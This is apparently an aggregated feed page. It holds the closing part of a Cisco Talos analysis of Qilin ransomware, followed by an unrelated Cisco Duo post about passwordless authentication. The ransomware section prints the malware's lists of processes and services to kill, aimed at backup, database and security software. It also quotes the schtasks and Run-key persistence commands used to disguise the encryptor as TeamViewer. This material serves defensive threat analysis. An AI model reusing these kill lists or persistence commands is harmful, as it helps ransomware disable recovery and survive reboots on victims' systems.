["vmms", "vmwp", "vmcompute", "agntsvc", "dbeng50", "dbsnmp", "encsvc", "excel", "firefox", "infopath", "isqlplussvc", "sql", "msaccess", "mspub", "mydesktopqos", "mydesktopservice", "notepad", "ocautoupds", "ocomm", "ocssd", "onenote", "oracle", "outlook", "powerpnt", "sqbcoreservice", "steam", "synctime", "tbirdconfig", "thebat", "thunderbird", "visio", "winword", "wordpad", "xfssvccon", "bedbh", "vxmon", "benetns", "bengien", "pvlsvr", "beserver", "raw_agent_svc", "vsnapvss", "cagservice", "qbidpservice", "qbdbmgrn", "qbcfmonitorservice", "sap", "teamviewer_service", "teamviewer", "tv_w32", "tv_x64", "cvmountd", "cvd", "cvfwd", "cvods", "saphostexec", "saposcol", "sapstartsrv", "avagent", "avscc", "dellsystemdetect", "enterpriseclient", "veeamnfssvc", "veeamtransportsvc", "veeamdeploymentsvc", "mvdesktopservice"]

win_services_black_list

["vmms", "mepocs", "memtas", "veeam", "backup", "vss", "sql", "msexchange", "sophos", "msexchange", "msexchange\$", "wsbexchange", "pdvfsservice", "backupexecvssprovider", "backupexecagentaccelerator", "backupexecagentbrowser", "backupexecdivecimediaservice", "backupexecjobengine", "backupexecmanagementservice", "backupexecrpcservice", "gxblr", "gxvss", "gxclmgrs", "gxcvd", "gxcimgr", "gxmmm", "gxvsshwprov", "gxfwd", "sapservice", "sap", "sap\$", "sapd\$", "saphostcontrol", "saphostexec", "qbcfmonitorservice", "qbdbmgrn", "qbidpservice", "acronisagent", "veeamnfssvc", "veeamdeploymentservice", "veeamtransportsvc", "mvarmor", "mvarmor64", "vsnapvss", "acrsch2svc", "(.*?)sql(.*?)"]

Accounts

Generating execution logs

When running, it creates a QLOG folder in %TEMP% and multiple ThreadId({Number}).LOG files. They allow the attacker to inspect detailed logs of the encryption process.

Change wallpaper setting

The ransomware creates a JPG image under %TEMP% to be used as the wallpaper, and modifies the following registry values.

HKEY_CURRENT_USERControl PanelDesktopWallpaper
(Example)
Value: C:%TEMP%ElSDJGep.jpg

Persistence

After ransomware execution, the attacker achieves persistence through both task scheduling and registry modification. First, a scheduled task is created with the name “TVInstallRestore”, configured to run at logon using the /SC ONLOGON argument. To disguise itself as a legitimate tool, the ransomware file is named “TeamViewer_Host_Setup – <encryptor_2>.exe”, leveraging the TeamViewer brand (which had been installed as an RMM tool prior to compromise). Second, to ensure the ransomware executes upon every reboot, its executable is added as a value under the RUN registry key.

This combination of scheduled tasks and registry entries allows the ransomware to maintain persistence across system restarts and user logons.

C:WINDOWSsystem32schtasks /Create /TN TVInstallRestore /TR "C:-INSTALLERSTeamViewer_Host_Setup - <encryptor_2>.exe /RESTORE" /RU SYSTEM /SC ONLOGON /F

HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
Key
*random-alphabet in lowercase letters
Key Value
C:UsersAdministratorDesktop<encryptor_2>.exe --password [PASSWORD]--no-admin;

Appendix

MITRE ATT&CK TTPs

Coverage

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.　Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort SIDs for the threats are: 65446

ClamAV detections are also available for this threat:

• Win.Ransomware.Qilin-10044197-0
• Win.Trojan.Systembc-10058229-0
• Win.Loader.CobaltStrike-10058228-0
• Win.Dropper.Mimikatz-9778171-1

Indicators of compromise (IOCs)

The IOCs can also be found in our GitHub repository here.

Cisco Talos Blog – ​Read More

By Janet Ho, Cisco Duo

Why passwords are still a problem

We’ve relied on passwords for years to protect our online accounts, but they’ve also become one of the easiest ways attackers get in. Many people reuse or simplify passwords, or even write them down because it’s hard to remember so many. That makes it easier for attackers to take advantage of stolen or reused credentials, and even worse, one stolen password can sometimes unlock several accounts.  

Did you know? According to Forbes, 244 million passwords were leaked on a single crime forum, and half of the world’s internet users have been exposed to reuse attacks. 

That’s why passwordless authentication is becoming so important. It lets you prove who you are without typing a password, using things like your fingerprint, face, or a security key on your device. This makes sign-ins easier for you and harder for attackers to fake, helping protect against phishing and stolen or weak passwords. 

Clearing up the biggest myths about passwordless 

Even with all these benefits, a few common myths still make people hesitate about going passwordless. Let’s clear them up. 

It’s easy to assume that “passwordless” means skipping an important layer of protection. 

In reality, passwordless is multi-factor. It verifies who you are using both your device and something only you can provide like your fingerprint or PIN. 

When you log in, your device unlocks a unique digital key that never leaves it. Your fingerprint, face or PIN is only checked locally, not sent online. This makes it nearly impossible for attackers to steal or fake your login, the same strength as MFA, just without the password hassle. 

A PIN might look like a password, but it doesn’t work the same way. Instead of being sent over the internet or stored on a company server, your PIN only unlocks your device locally. That means there’s nothing for attackers to steal or guess remotely. 

Even a short PIN can be strong because your device limits how many times someone can try it. An attacker would have to physically possess your device to even attempt it. If you want extra protection, you can use a biometric like a fingerprint or face scan instead. 

Biometrics sometimes get a bad reputation because people remember early flaws or scary headlines like phones that could be fooled by photos or fake fingerprints. Those issues came from outdated, low-cost sensors that were easier to trick. 

Modern systems like Face ID and Windows Hello use 3D mapping, infrared light and “liveness” detection to make spoofing extremely difficult. In passwordless authentication, your fingerprint or face simply unlocks a private key stored on your device. That key never leaves your phone or computer and can’t be reused on other sites. Because biometrics are checked locally, not online, they block the remote attacks that plague passwords. 

Some worry that using biometrics means handing over personal data that could be stolen. That concern usually comes from news about biometric surveillance, where information is stored in large central databases.  

Passwordless authentication works differently. Your biometric stays on your device and is only used to unlock a local security key — it’s never uploaded, shared, or compared against a massive database. 

The difference matters. Surveillance biometrics identify you remotely by matching your data against millions of records. Authentication biometrics, like Face ID or Windows Hello, simply confirm that you are the one holding your own device. That local check is what keeps your biometric private and safe. 

A truly phishing-resistant passwordless system has a few built-in protections against modern phishing techniques. 

Each login uses a unique digital key that stays on your device and never gets sent to the website. Even if someone builds a fake login page, there’s nothing to steal or reuse. That’s because passwordless systems check that you’re on the real website, not a look-alike page. Your browser does that check automatically before letting your device complete the login. 

And only trusted software on your device can trigger your authenticator to approve a login. Hidden apps or push-phishing attempts can’t reach it. 

Together, these protections make phishing far harder and, in most cases, stop it completely.  

The bottom line: Easier, safer sign-ins for everyone 

Passwordless isn’t just a new way to log in. It’s a safer, simpler way to protect what matters most. Whether at home or at work, taking small steps toward passwordless helps reduce risk and makes security easier for everyone. 

Learn more about the myths and read the full report on Busting Passwordless Myths. 

Take the next step and check out 5 Step Path to Passwordless ebook. 

Cisco Talos Blog – ​Read More